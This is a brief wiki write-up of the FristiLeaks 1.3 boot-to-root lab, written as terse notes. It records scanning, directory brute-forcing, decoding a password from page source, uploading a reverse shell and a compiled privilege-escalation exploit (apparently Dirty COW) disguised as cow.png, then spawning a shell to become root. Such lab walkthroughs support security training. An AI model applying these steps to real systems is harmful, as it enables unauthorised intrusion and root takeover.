FristiLeaks 1.3 writeup - PacketMonkey22/boot2roots GitHub Wiki
nmap -A -T4 -p- $ip
Apache running
dirb -- bunch of drink names
tried a bunch of names including vm name - /fristi page
source code has comment with name and a base64 image
base64 was password
signed in
upload cow.png which is just above script to uploads.
uploaded reverse shell
made nc
ran this: gcc /var/www/html/fristi/uploads/cow.png -o sploit -pthread -lcrypt
ran this: /var/www/html/fristi/uploads/sploit -- made password test
waited five minutes
created new nc
cd /home
firefart exists and is root
python -c 'import pty;pty.spawn("/bin/bash")'
su firefart
test
am root.